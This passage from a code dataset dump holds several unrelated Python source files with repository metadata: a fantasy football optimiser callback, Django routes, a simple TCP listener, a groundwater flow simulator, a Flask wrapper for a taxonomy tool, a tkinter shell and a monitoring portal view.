State('uncertain-flag', 'value')],\n prevent_initial_call=True)\ndef execute_squad_optimization(n_clicks, gw_id, model_name, formation, squad_val, bench_val, uncertain_flag):\n if not gw_id:\n msg = html.P(\"Please select GW for scoring\")\n return msg, msg\n\n if not model_name:\n msg = html.P(\"Please select Model\")\n return msg, msg\n\n if not formation:\n msg = html.P(\"Please select Formation\")\n return msg, msg\n\n if not squad_val:\n msg = html.P(\"Please select Squad Value\")\n return msg, msg\n\n if not bench_val:\n msg = html.P(\"Please select Bench Value\")\n return msg, msg\n\n if not uncertain_flag:\n msg = html.P(\"Please select Uncertain Flag\")\n return msg, msg\n df_leads = load_leads(gw_id)\n # pdb.set_trace()\n df_leads[\"name\"] = df_leads[\"name\"].apply(lambda x: str(x).encode('ascii', 'ignore'))\n print(df_leads.head())\n if n_clicks:\n df_squad_xi, sol_info_xi = squad_optimizer(df_leads, formation=formation,\n budget=squad_val - bench_val, optimise_on=model_name)\n xi_players = [int(i) for i in formation.split('-')]\n bench_players = [str(2 - xi_players[0]), str(5 - xi_players[1]), str(5 - xi_players[2]), str(3 - xi_players[3])]\n bench_formation = \"-\".join(bench_players)\n xi_names = df_squad_xi[\"name\"].unique().tolist()\n df_leads = df_leads[~df_leads[\"name\"].isin(xi_names)].copy()\n df_squad_bench, sol_info_bench = squad_optimizer(df_leads, formation=bench_formation,\n budget=bench_val, optimise_on=model_name)\n\n df_squad_xi[\"name\"] = df_squad_xi[\"name\"].apply(lambda x: x.decode('utf-8'))\n df_squad_bench[\"name\"] = df_squad_bench[\"name\"].apply(lambda x: x.decode('utf-8'))\n # df_squad = df_squad[[\"position\", \"cost\", \"points\"]].copy()\n df_squad_xi[\"points\"] = df_squad_xi[\"points\"].round(2)\n df_squad_bench[\"points\"] = df_squad_bench[\"points\"].round(2)\n col_map = {\"name\": \"Player\", \"team\": \"Team\", \"cost\": \"Cost\", \"position\": \"Position\", \"points\": model_name}\n df_squad_xi = df_squad_xi.rename(columns=col_map)\n df_squad_bench = df_squad_bench.rename(columns=col_map)\n position_map = {'GK': 1, 'DEF': 2, 'MID': 3, 'FWD': 4}\n\n df_squad_xi[\"pos_map\"] = df_squad_xi[\"Position\"].apply(lambda x: position_map[x])\n df_squad_bench[\"pos_map\"] = df_squad_bench[\"Position\"].apply(lambda x: position_map[x])\n df_squad_xi = df_squad_xi.sort_values(by=[\"pos_map\"])\n df_squad_bench = df_squad_bench.sort_values(by=[\"pos_map\"])\n df_squad_xi = df_squad_xi.drop(columns=[\"pos_map\"])\n df_squad_bench = df_squad_bench.drop(columns=[\"pos_map\"])\n table_xi, table_bench = make_table(df_squad_xi, page_size=11), make_table(df_squad_bench)\n\n return table_xi, table_bench\n else:\n return html.P(\"Button Not Clicked!\")\n\n\n@app.callback(Output('transfer-suggestion-output', 'children'),\n [Input('transfer-optimization-btn', 'n_clicks')],\n [State('manager-selection-transfers', 'value'),\n State('transfer-selection-numbers', 'value'),\n State('gw-selection-dropdown-squad', 'value'),\n State('model-selection-dropdown-optim', 'value')],\n prevent_initial_call=True)\ndef execute_transfer_suggestions(n_clicks, manager_id, num_transfers, gw_id, model_name):\n if not manager_id:\n msg = html.P(\"Please select manager...\")\n return msg\n if not num_transfers:\n msg = html.P(\"Please select number of transfer to be made...\")\n return msg\n if not gw_id:\n msg = html.P(\"Please select GW for scoring...\")\n return msg\n if not model_name:\n msg = html.P(\"Please select ML Model...\")\n return msg\n\n if n_clicks:\n tables = []\n n_suggestions = 5\n df_leads = load_leads(gw_id)\n\n for i in range(n_suggestions):\n try:\n df_transfer = transfer_optimizer(df_leads, manager_id, num_transfers, model_name)\n tables.append(make_table(df_transfer))\n exclude_names = df_transfer[\"Transfer In\"].unique().tolist()\n df_leads = df_leads[~df_leads[\"name\"].isin(exclude_names)].copy()\n except:\n pass\n\n output = html.Div(\n children= tables\n )\n\n return output\n\n return html.P(\"Button Not Clicked!\")\n","repo_name":"rbiswasfc/fpl-portal","sub_path":"callbacks/callback_squad.py","file_name":"callback_squad.py","file_ext":"py","file_size_in_byte":19779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"15403946953","text":"from django.conf.urls import url, include, re_path\nfrom ajax_select import urls as ajax_select_urls\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic import RedirectView\n\nfrom . import views\nfrom .views import IndexView, RowerList, RowerDetail, RaceList, RaceDetail, RankingView, AboutView, ClubList, ClubDetail, RowerSearch, CompetitionView, CompetitionResults, RowerCompare, Compare, IndexView2, KnockoutView, WeatherCalc\nurlpatterns = [\n\t#re_path(r'^$', views.current_datetime, name='index'),\n\t#re_path(r'^recalculate/$', views.CalculateView),\n\t#re_path(r'^$', views.IndexView.as_view(), name='index'),\n\tre_path(r'^$', views.IndexView2, name='index'),\n\tre_path(r'^about/$', views.AboutView.as_view(), name='about'),\n\tre_path(r'^rowers/$', RowerList.as_view(), name=\"rower-list\"),\n\tre_path(r'^rowers/(?P[0-9]+)/$', views.RowerDetail, name=\"rower-detail\"),\n\tre_path(r'^races/$', RaceList.as_view(), name=\"race-list\"),\n\tre_path(r'^races/(?P[0-9]+)/$', views.RaceDetail, name=\"race-detail\"),\n\tre_path(r'^rankings/$', views.RankingView, name=\"ranking\"),\n\tre_path(r'^competition/$', views.CompetitionView, name=\"comp-list\"),\n\tre_path(r'^competition/(?P[0-9]+)/$', views.CompetitionResults, name=\"comp-detail\"),\n\tre_path(r'^clubs/$', ClubList.as_view(), name=\"club-list\"),\n\tre_path(r'^clubs/(?P[0-9]+)/$', views.ClubDetail, name=\"club-detail\"),\n\t#re_path(r'^compare/$', csrf_exempt(views.Compare), name=\"compare-index\"),\n\tre_path(r'^compare/$', views.RowerCompare2, name=\"compare2\"),\n\tre_path(r'^crewcompare/$', views.CrewCompare, name=\"crewcompare\"),\n\tre_path(r'^rowing/hrr/(?P[0-9]+)/$', views.KnockoutView, name=\"knockouts\"),\n\tre_path(r'^favicon\\.ico$',RedirectView.as_view(url='/static/favicon.ico')),\n re_path(r'^weather/$', views.WeatherCalc, name=\"weather\"),\n\t#re_path(r'^compare/(?P[0-9]+)/(?P[0-9]+)/$', views.RowerCompare, name=\"compare\"),\n\t#re_path(r'^rower-autocomplete/$', RowerAutocomplete.as_view(), name=\"rower-autocomplete\"),\n\t#re_path(r'rowerm2m/$', CrewUpdate.as_view(), name=\"crew-update\"),\n\n\t# used in the search function on the rowers view\n\tre_path(r'^rowersearch/$', views.RowerSearch, name=\"rower-search\"),\n\t\n\t# used in autoselect in admin\n\tre_path(r'^ajax_select/', include(ajax_select_urls)),\n]","repo_name":"charlesbarry/rowingstats","sub_path":"rowing/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"29356506297","text":"import socket\nimport threading\nimport signal\nimport sys\n\n# Define the IP address and port to listen on\nIP = '0.0.0.0' # Listen on all available network interfaces\nPORT = 1234 # Port number to listen on\n\n# Global variable to track whether the server should continue running\nserver_running = True\n\n# Function to handle incoming client connections\ndef handle_client(client_socket):\n with client_socket as sock:\n # Receive data from the client (up to 1024 bytes)\n request = sock.recv(1024)\n print(f'[*] Received: {request.decode(\"utf-8\")}')\n \n # Send a simple acknowledgment back to the client\n sock.send(b'ACK')\n\n# Signal handler for ctrl+c\ndef signal_handler(sig, frame):\n global server_running\n print(\"[*] Exiting server...\")\n server_running = False\n sys.exit(0)\n\n# Main function to set up the server\ndef main():\n # Register the signal handler for ctrl+c\n signal.signal(signal.SIGINT, signal_handler)\n \n # Create a socket object using IPv4 and TCP\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # Bind the socket to the IP and port\n server.bind((IP, PORT))\n\n # Listen for incoming connections, allowing up to 5 queued connections\n server.listen(5)\n print(f'[*] Listening on {IP}:{PORT}')\n\n while server_running:\n try:\n # Accept an incoming connection, client is a new socket object\n # and address is the client's address (IP and port)\n client, address = server.accept()\n print(f'[*] Accepted connection from {address[0]}:{address[1]}')\n\n # Create a new thread to handle the client's communication\n client_handler = threading.Thread(target=handle_client, args=(client,))\n client_handler.start()\n except KeyboardInterrupt:\n # If ctrl+c is pressed during server operation, terminate gracefully\n print(\"[*] Server interrupted by user.\")\n server.close()\n sys.exit(0)\n\nif __name__ == '__main__':\n main()\n","repo_name":"CaptLevi0408/Black-Hat-Python","sub_path":"Basic Networking Tools/tcp_server.py","file_name":"tcp_server.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"931098669","text":"# 地下水流随机方程的数值模拟求解尝试\nimport random\nfrom scipy.fftpack import fft, ifft\n\nimport numpy as np\nfrom numpy import sin, cos, tan\nimport numpy.linalg as nla\nfrom sympy import symbols\nimport sympy as sy\nimport matplotlib\n\nmatplotlib.use('QtAgg')\nimport matplotlib.pyplot as plt\n\n\nclass Random_flow:\n def __init__(self):\n self.ic = None\n self.tl = None\n self.st = None\n self.name_chinese = \"非稳定随机一维流\"\n self.xl = None\n self.sl = None\n self.h_r = []\n self.h_l = []\n self.B = 1 # 默认一维流的宽度为1个单位\n\n def l_boundary(self, h_l, Dirichlet=False, Neumann=False, Robin=False): # 左边界\n if Dirichlet:\n self.h_l = [1, float(h_l)]\n elif Neumann:\n self.h_l = [2, float(h_l)]\n\n def r_boundary(self, h_r, Dirichlet=False, Neumann=False, Robin=False): # 右边界\n if Dirichlet:\n self.h_r = [1, float(h_r)]\n elif Neumann:\n self.h_r = [2, float(h_r)]\n\n def step_length(self, sl): # X轴差分步长\n self.sl = float(sl)\n\n def step_time(self, st): # 时间轴差分步长\n self.st = float(st)\n\n def x_length(self, xl): # X轴轴长\n self.xl = float(xl)\n\n def t_length(self, tl): # 时间轴轴长,原则上单位为天\n self.tl = float(tl)\n\n def initial_condition(self, ic: str): # 初始条件的水头设定\n self.ic = str(ic)\n\n def width(self, B): # 含水层宽度的设定\n self.B = float(B)\n\n def draw(self, H_ALL: np.ndarray, time=0, title=''): # 按给定的时刻绘制水头曲线\n # X轴单元格的数目\n m = int(self.xl / self.sl) + 1\n # X轴\n X = np.linspace(0, self.xl, m)\n # 可以plt绘图过程中中文无法显示的问题\n plt.rcParams['font.sans-serif'] = ['SimHei']\n # 解决负号为方块的问题\n plt.rcParams['axes.unicode_minus'] = False\n fig = plt.figure(figsize=(10, 7))\n ax = fig.add_subplot()\n ax.plot(X, H_ALL[time], linewidth=1, antialiased=True)\n\n def maxH_y(h_all):\n hy = 0\n for i in h_all:\n if i > hy:\n hy = i\n return hy\n\n def minH_y(h_all):\n hy = 0\n for i in h_all:\n if i < hy:\n hy = i\n return hy\n\n ax.set_ylim(minH_y(H_ALL[time]), maxH_y(H_ALL[time]))\n ax.set(ylabel='水头(m)', xlabel='X轴(m)')\n plt.suptitle(self.name_chinese)\n if title == '':\n plt.title(\"差分数值解,当前为第{0}时刻(差分空间步长{1},时间步长{2})\".format(time, self.sl, self.st))\n else:\n plt.title(title)\n plt.show()\n\n def draw_location(self, H_ALL: np.ndarray, location=0, title=''): # 按给定的时刻绘制水头曲线\n # T轴单元格的数目\n m = int(self.tl / self.st) + 1\n # T轴\n T = np.linspace(0, self.tl, m)\n # 水头轴\n H = []\n for i in H_ALL:\n H.append(i[location])\n # 可以plt绘图过程中中文无法显示的问题\n plt.rcParams['font.sans-serif'] = ['SimHei']\n # 解决负号为方块的问题\n plt.rcParams['axes.unicode_minus'] = False\n fig = plt.figure(figsize=(10, 7))\n ax = fig.add_subplot()\n ax.plot(T, H, linewidth=1, antialiased=True)\n ax.set_ylim(min(H) - 1, max(H) + 1)\n ax.set(ylabel='水头(m)', xlabel='时间轴(d)')\n plt.suptitle(self.name_chinese)\n if title == '':\n plt.title(\"差分数值解,当前为第{0}位置(差分空间步长{1},时间步长{2})\".format(location, self.sl, self.st))\n else:\n plt.title(title)\n plt.show()\n\n def draw_surface(self, H_ALL: np.ndarray, title=''): # 绘制表面图\n # X轴单元格的数目\n m = int(self.xl / self.sl) + 1\n # 时间轴单元格数目\n n = int(self.tl / self.st) + 1\n # X轴\n X = np.linspace(0, self.xl, m)\n # 时间轴\n T = np.linspace(0, self.tl, n)\n # 定义初值\n X, T = np.meshgrid(X, T)\n # 可以plt绘图过程中中文无法显示的问题\n plt.rcParams['font.sans-serif'] = ['SimHei']\n # 解决负号为方块的问题\n plt.rcParams['axes.unicode_minus'] = False\n fig = plt.figure(figsize=(10, 7))\n ax = fig.add_subplot(projection='3d')\n\n def maxH_z(h_all):\n hz = 0\n for i in h_all:\n for j in i:\n if j > hz:\n hz = j\n return hz\n\n def minH_z(h_all):\n hz = 0\n for i in h_all:\n for j in i:\n if j < hz:\n hz = j\n return hz\n\n ax.set_zlim(minH_z(H_ALL), maxH_z(H_ALL))\n ax.plot_surface(X, T, H_ALL, linewidth=0, antialiased=True, cmap=plt.get_cmap('rainbow'))\n ax.set(zlabel='水头(m)', ylabel='时间轴(d)', xlabel='X轴(m)')\n plt.suptitle(self.name_chinese)\n if title == '':\n plt.title(\"差分数值解(差分空间步长{0},时间步长{1})\".format(self.sl, self.st))\n else:\n plt.title(title)\n plt.show()\n\n\nclass Random_one_dimension_boussinesq(Random_flow):\n def __init__(self):\n super().__init__()\n self.we = None\n self.Sy = None\n self.K = None\n self.w = None\n self.a = None\n self.a_as = None\n self.ha = None\n self.name_chinese = '潜水含水层随机非稳定一维流'\n\n def reference_thickness(self, ha): # 潜水含水层的参考厚度,解析解求解中使用参考厚度法线性化偏微分方程\n self.ha = float(ha)\n\n def pressure_diffusion_coefficient(self, a): # 潜水含水层压力扩散系数的设定。等于渗透系数乘初始水头常数除给水度Kh0/Sy\n self.a = float(a)\n\n def source_sink_expectation(self, we): # 源汇项期望值的设定\n self.we = float(we)\n\n def source_sink_term(self, w: str): # 潜水含水层源汇项的设定,可以为一个常数也可以为函数,如sin(x) + cos(t)\n self.w = w\n\n def fft_source_sink_term(self): # 对源汇项做快速傅里叶变换\n # 时间轴单元格数目\n n = int(self.tl / self.st) + 1\n # 时间轴\n t = np.linspace(0, self.tl, n)\n fft_w = fft(eval(self.w))\n return fft_w\n\n @staticmethod\n def fft_location(H_ALL: np.ndarray, location=0): # 对一个位置的不同时刻水头做快速傅里叶变换\n # 同一位置不同时刻的离散水头\n H = []\n for i in H_ALL:\n H.append(i[location])\n fft_H = fft(H)\n return fft_H\n\n def hydraulic_conductivity(self, K): # 潜水含水层渗透系数的设定\n self.K = float(K)\n\n def specific_yield(self, Sy): # 潜水含水层储水系数(重力给水度)的设定\n self.Sy = float(Sy)\n\n def random_w(self):\n # 随机振幅生成\n amplitude = random.uniform(0, self.we)\n # 随机周期生成\n while True:\n cycle = self.tl / int(random.uniform(1, 50)) # 依据香农采样定理采样频率必须大于信号频率的两倍\n if cycle >= 3 * self.st: # 所以信号周期的随机生成必须大于采样周期的两倍,本程序取三倍\n break\n # 随机频率\n frequency = 1 / cycle\n return amplitude, cycle, frequency\n\n def solve(self):\n # 如果未设定压力扩散系数\n if self.a is None or self.a == \"\":\n self.a = self.K / self.Sy\n # 对于潜水含水层一维非稳定流,定义两个参数 x t\n x = symbols(\"x\")\n t = symbols(\"t\")\n # X轴差分点的数目\n m = int(self.xl / self.sl) + 1\n # 时间轴差分点的数目\n n = int(self.tl / self.st) + 1\n\n # 对函数W(x, t)定义为源汇项函数除以渗透系数K\n def W(x, t):\n return eval(self.w) / self.K\n\n # 函数IC定义为初始水头分布曲线\n def IC(x):\n return eval(self.ic)\n\n # 创建一个全部值为0的矩阵,用于存放各个差分位置的水头值\n H_ALL = np.zeros((n, m))\n # 常数b矩阵\n H_b = np.zeros((m * n, 1))\n # 系数a矩阵\n H_a = np.zeros((m * n, m * n))\n # 定义系数a矩阵的行数\n\n # 矩阵赋值\n for k in range(0, n): # 对行(时间轴)进行扫描\n iteration_times = 0 # 迭代运算次数计数\n H_previous_iteration = np.zeros((1, m))\n # 迭代运算开始\n while True:\n H_a = np.zeros((m, m))\n l_a = 0\n H_b = np.zeros((m, 1))\n\n if iteration_times == 0 and k != 0:\n H_previous_iteration = H_ALL[k - 1] # 前次迭代的当前时刻水头数值,此处未开始计算,使用上一时刻的水头值进行近似\n\n for i in range(0, m): # 对列(X轴)进行扫描\n # 时间边界赋值(初始条件)\n if k == 0:\n H_a[l_a, l_a] = 1\n H_b[l_a] = IC(i * self.sl)\n\n # 左边界赋值\n elif (i - 1) < 0 and self.h_l[0] == 1: # 一类边界判断\n H_a[l_a, l_a] = 1\n H_b[l_a] = self.h_l[1]\n elif (i - 1) < 0 and self.h_l[0] == 2: # 二类边界判断\n # 源汇项赋值\n H_b[l_a] = - W(i * self.sl, k * self.st) - self.Sy / (self.K * self.st) * H_ALL[\n k - 1, i] - 2 * self.sl * self.h_l[1] * (\n H_previous_iteration[i] + self.h_l[1] * 0.5 * self.sl) / (\n self.sl * self.sl)\n # 给位置为(i, k)处的水头赋上系数值\n H_a[l_a, l_a] = -(H_previous_iteration[i + 1] + H_previous_iteration[i]) / (\n 2 * self.sl * self.sl) - (H_previous_iteration[i] + self.h_l[1] * 0.5 * self.sl) / (\n self.sl * self.sl) - self.Sy / (self.K * self.st)\n # 给位置为(i+1, k)处的水头赋上系数值\n H_a[l_a, l_a + 1] = (H_previous_iteration[i + 1] + H_previous_iteration[i]) / (\n 2 * self.sl * self.sl) + (H_previous_iteration[i] + self.h_l[1] * 0.5 * self.sl) / (\n self.sl * self.sl)\n\n # 右边界赋值\n elif (i + 1) == m and self.h_r[0] == 1:\n H_a[l_a, l_a] = 1\n H_b[l_a] = self.h_r[1]\n elif (i + 1) == m and self.h_r[0] == 2:\n # 源汇项赋值\n H_b[l_a] = - W(i * self.sl, k * self.st) - self.Sy / (self.K * self.st) * H_ALL[\n k - 1, i] + 2 * self.sl * self.h_r[1] * (\n H_previous_iteration[i] + self.h_r[1] * 0.5 * self.sl) / (\n self.sl * self.sl)\n # 给位置为(i, k)处的水头赋上系数值\n H_a[l_a, l_a] = - (H_previous_iteration[i] + self.h_r[1] * 0.5 * self.sl) / (\n self.sl * self.sl) - (H_previous_iteration[i] + H_previous_iteration[i - 1]) / (\n 2 * self.sl * self.sl) - self.Sy / (self.K * self.st)\n # 给位置为(i-1, k)处的水头赋上系数值\n H_a[l_a, l_a - 1] = (H_previous_iteration[i] + H_previous_iteration[i - 1]) / (\n 2 * self.sl * self.sl) + (H_previous_iteration[i] + self.h_r[1] * 0.5 * self.sl) / (\n self.sl * self.sl)\n else: # 非边界部分赋值\n # 源汇项赋值\n H_b[l_a] = - W(i * self.sl, k * self.st) - self.Sy / (self.K * self.st) * H_ALL[\n k - 1, i]\n # 给位置为(i, k)处的水头赋上系数值\n H_a[l_a, l_a] = -(H_previous_iteration[i + 1] + H_previous_iteration[i]) / (\n 2 * self.sl * self.sl) - (H_previous_iteration[i] + H_previous_iteration[i - 1]) / (\n 2 * self.sl * self.sl) - self.Sy / (self.K * self.st)\n # 给位置为(i-1,k)处的水头赋上系数值\n H_a[l_a, l_a - 1] = (H_previous_iteration[i] + H_previous_iteration[i - 1]) / (\n 2 * self.sl * self.sl)\n # 给位置为(i+1, k)处的水头赋上系数值\n H_a[l_a, l_a + 1] = (H_previous_iteration[i + 1] + H_previous_iteration[i]) / (\n 2 * self.sl * self.sl)\n l_a += 1\n\n H = nla.solve(H_a, H_b) # 进行当前时刻的水头计算结果\n if k == 0: # 第零时刻不参与迭代计算\n break\n\n # 判断是否满足精度需求\n precision = 0\n for u in range(0, m):\n if abs(H_previous_iteration[u] - H[u]) > 0.01:\n precision = 1\n if precision != 1:\n break\n else:\n iteration_times += 1\n H_previous_iteration = H\n\n if iteration_times > 100:\n break\n for o in range(0, m): # 对空间进行扫描,整合成所有适合的计算水头\n H_ALL[k, o] = H[o]\n return H_ALL\n\n\nif __name__ == \"__main__\":\n flow = Random_one_dimension_boussinesq()\n flow.sl = 10\n flow.st = 5\n flow.ic = '60 + x * np.tan(3.1415/120) + 5 * np.sin(x/60)'\n flow.tl = 365\n flow.xl = 2000\n flow.h_r = [2, 0]\n flow.h_l = [1, 60]\n flow.Sy = 0.08\n flow.K = 10\n flow.we = 0.4\n # flow.w = '0'\n flow.w = '0.4/36 + 0.1/36 * sin(3.1415*t/200) + 0.05/36 * sin(3.1415*t/10)'\n d = flow.fft_source_sink_term()\n h = flow.solve()\n # flow.draw(H_ALL=h, time=0)\n a, b, c = flow.random_w()\n # print(a)\n # print(b)\n # print(c)\n\n print(len(d))\n\n flow.draw_surface(H_ALL=h)\n","repo_name":"YuLei-1005203115/FDM_groundwater","sub_path":"FDMgroundwater/randomflow.py","file_name":"randomflow.py","file_ext":"py","file_size_in_byte":14769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"40409864086","text":"from flask import Flask, jsonify, make_response, url_for, request\nimport pynomer\nfrom datetime import datetime\nimport logging\nimport sys\nimport os\n\napp = Flask(__name__)\n\nhandler = logging.StreamHandler(sys.stdout)\nhandler.setFormatter(\n logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n)\napp.logger.addHandler(handler)\napp.logger.setLevel(logging.DEBUG)\n\n\n# @app.before_first_request\n# def load_cache():\n# app.logger.info(\"Clean taxon cache\")\n# run_nomer(nomer_cmd=get_nomer_simple_cmd(cmd=\"clean\"))\n# app.logger.info(\"Load taxon cache\")\n# run_nomer(get_nomer_match_cmd(cmd=\"append\", id=\"GBIF:1\"))\n# app.logger.info(\"Ready to start server\")\n\n\n@app.route(\"/\")\ndef index():\n return \"\"\"\n Nomer in Docker! \n A web-app for running Nomer inside Docker.
\n \"\"\"\n\n\n@app.route(\"/version\", methods=[\"GET\"])\ndef version():\n \"\"\"\n Show Version.\n \"\"\"\n cmd, result = pynomer.version()\n return get_response(cmd, result)\n\n\n@app.route(\"/clean\", methods=[\"GET\"])\ndef clean():\n \"\"\"\n Cleans term matcher cache.\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n\n cmd, result = pynomer.clean(properties=p)\n return get_response(cmd, result)\n\n\n@app.route(\"/matchers\", methods=[\"GET\"])\ndef matchers():\n \"\"\"\n Lists supported matcher and (optionally) their descriptions.\n :param o: [\"tsv\", \"json\"] Output format. Default: \"tsv\"\n :param v: [bool] If set, matcher descriptions are included for tsv. Default: False\n \"\"\"\n o = request.args.get(\"o\", \"tsv\")\n v = request.args.get(\"v\", \"\")\n\n cmd, result = pynomer.matchers(output_format=o, verbose=v)\n return get_response(cmd, result)\n\n\n@app.route(\"/replace\", methods=[\"GET\"])\ndef replace():\n \"\"\"\n Replace exact term matches in row. The input schema is used\n to select the id and/or name to match to. The output schema is\n used to select the columns to write into.\n :param query: [string] Query. Default: \n :param matcher: [string] Selected matcher. Default: \"globi-taxon-cache\"\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n\n query = request.args.get(\"query\", \"\")\n matcher = request.args.get(\"matcher\", \"globi-taxon-cache\")\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n e = False\n\n cmd, result = pynomer.replace(\n query=query, matcher=matcher, properties=p, echo_opt=\"-e\" if e else \"\"\n )\n return get_response(cmd, result)\n\n\n@app.route(\"/append\", methods=[\"GET\"])\ndef append():\n \"\"\"\n Append term match to row using id and name columns specified\n in input schema. Multiple matches result in multiple rows.\n :param query: [string] Query. Default: \n :param matcher: [string] Selected matcher. Default: \"globi-taxon-cache\"\n :param p: [string] Path to properties file to override defaults. Default: None\n :param o: [\"tsv\", \"json\"] Output format. Default: \"tsv\"\n \"\"\"\n query = request.args.get(\"query\", \"\")\n matcher = request.args.get(\"matcher\", \"globi-taxon-cache\")\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n o = request.args.get(\"o\", \"tsv\")\n e = False\n\n cmd, result = pynomer.append(\n query=query,\n matcher=matcher,\n properties=p,\n output_format=o,\n echo_opt=\"-e\" if e else \"\",\n )\n return get_response(cmd, result)\n\n\n@app.route(\"/input_schema\", methods=[\"GET\"])\ndef input_schema():\n \"\"\"\n Show input schema in JSON.\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n\n cmd, result = pynomer.input_schema(properties=p)\n return get_response(cmd, result)\n\n\n@app.route(\"/output_schema\", methods=[\"GET\"])\ndef output_schema():\n \"\"\"\n Show output schema.\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n\n cmd, result = pynomer.output_schema(properties=p)\n return get_response(cmd, result)\n\n\n@app.route(\"/properties\", methods=[\"GET\"])\ndef properties():\n \"\"\"\n Lists configuration properties. Can be used to make a local copy and override\n default settings.\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n\n cmd, result = pynomer.properties(properties=p)\n return get_response(cmd, result)\n\n\n@app.route(\"/validate_term\", methods=[\"GET\"])\ndef validate_term():\n \"\"\"\n Validate terms.\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n filepath = request.args.get(\"filepath\", \"\")\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n\n cmd, result = pynomer.validate_term(filepath, properties=p)\n return get_response(cmd, result)\n\n\n@app.route(\"/validate_term_link\", methods=[\"GET\"])\ndef validate_term_link():\n \"\"\"\n Validate term links.\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n filepath = request.args.get(\"filepath\", \"\")\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n\n cmd, result = pynomer.validate_term_link(filepath, properties=p)\n return get_response(cmd, result)\n\n\ndef get_response(cmd, cmd_result):\n headers = {}\n return make_response(\n jsonify(\n {\n \"command\": cmd,\n \"result\": cmd_result,\n \"tstamp\": datetime.utcnow().timestamp(),\n \"endpoints\": {\"url_index\": url_for(\"index\", _external=True)},\n }\n ),\n 200,\n headers,\n )\n\n\ndef get_properties(p):\n p = p if p != \"None\" else None\n if p:\n path = os.path.join(os.getcwd(), \"input_properties\")\n with open(path, \"w\") as f:\n app.logger.debug(f\"Create new file {path} with content {p}\")\n f.write(p)\n return path\n return p\n\n\nif __name__ == \"__main__\":\n pynomer.append(query=\"\\tHomo sapiens\", matcher=\"globi-taxon-cache\")\n app.run(debug=True, host=\"0.0.0.0\", port=\"9090\", threaded=True)\n","repo_name":"nleguillarme/pynomer","sub_path":"pynomer/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6299,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"15966780973","text":"import tkinter as tk\nfrom tkinter import ttk\n\nfrom GUI_lent import Window as Lent\nfrom GUI_media import Window as Media\n\nclass App(tk.Tk):\n def __init__(self):\n tk.Tk.__init__(self)\n self.title(\"Barbara\")\n self.geometry('800x650')\n self.resizable(False, False)\n\n self.tabControl = ttk.Notebook(self)\n self.tab1 = ttk.Frame(self.tabControl)\n self.tab2 = ttk.Frame(self.tabControl)\n\n self.tabControl.add(self.tab1, text='lent')\n self.tabControl.add(self.tab2, text='media')\n self.tabControl.pack(expand=1, fill=\"both\")\n\n self.lent = Lent(self.tab1)\n self.media = Media(self.tab2)\n\n self.lent.pack(fill='x', anchor='s')\n self.media.pack()\n\n\nif __name__=='__main__':\n barbara = App()\n barbara.mainloop()\n","repo_name":"AkitoKay/Barbara","sub_path":"Code/GUI_main.py","file_name":"GUI_main.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"}
+{"seq_id":"32542636287","text":"__author__ = 'niean'\nfrom rrd import app\nfrom flask import request, g, render_template, jsonify\nfrom rrd.model.portal.poly import PolyMetric\nfrom rrd.utils.params import required_chk\nfrom rrd.utils.logger import logging\nfrom rrd.utils.format import replace_str_for_counter\nfrom rrd.config import *\nlog = logging.getLogger(__file__)\n\n\ndef gen_single_poly_grafana_link(grp_p, metric_p):\n '''\n\n https://grafana.xxxx.com/d/single_metric_falcon_poly_metric/single_metric_falcon_poly_metric?orgId=1\n &refresh=1m&var-metric_line=cpu_busy&var-metric=cpu.busy\n &var-poly_res_sum=poly_res_cpu_busy_sum&var-poly_res_avg=poly_res_cpu_busy_avg\n # &&var-falcon_poly_name=falcon_group_poly_data_system_openfalcon\n # &var-grp_name=data_system_openfalcon&\n # var-prome=falcon_group_data_system_openfalcon&\n # &var-group_name_point=data.system.openfalcon\n :return:\n '''\n prome_metric = replace_str_for_counter(metric_p.split('/',1)[0])\n\n grp_l = replace_str_for_counter(grp_p)\n metric_l = replace_str_for_counter(metric_p)\n url = '{}&var-grp_name={}&var-group_name_point={}&var-falcon_poly_name=falcon_group_poly_{}&var-prome=falcon_group_{}&var-poly_res_sum=poly_res_{}_sum&var-poly_res_avg=poly_res_{}_avg&var-metric_line={}&var-metric={}&var-prome_metric={}'.format(\n\n GRAFANA_SINGLE_POLY_URL,grp_l, grp_p, grp_l, grp_l, prome_metric, prome_metric, metric_l, metric_p,prome_metric)\n # print(url)\n return url\n\n\n@app.route('/portal/poly')\ndef polys_get():\n page = int(request.args.get('p', 1))\n limit = int(request.args.get('limit', 20))\n query = request.args.get('q', '').strip()\n mine = request.args.get('mine', '1')\n me = g.user.name if mine == '1' else None\n vs, total = PolyMetric.query(page, limit, query, me)\n\n new_vs = []\n for v in vs:\n setattr(v,'g_url',gen_single_poly_grafana_link(v.name,v.counter))\n new_vs.append(v)\n return 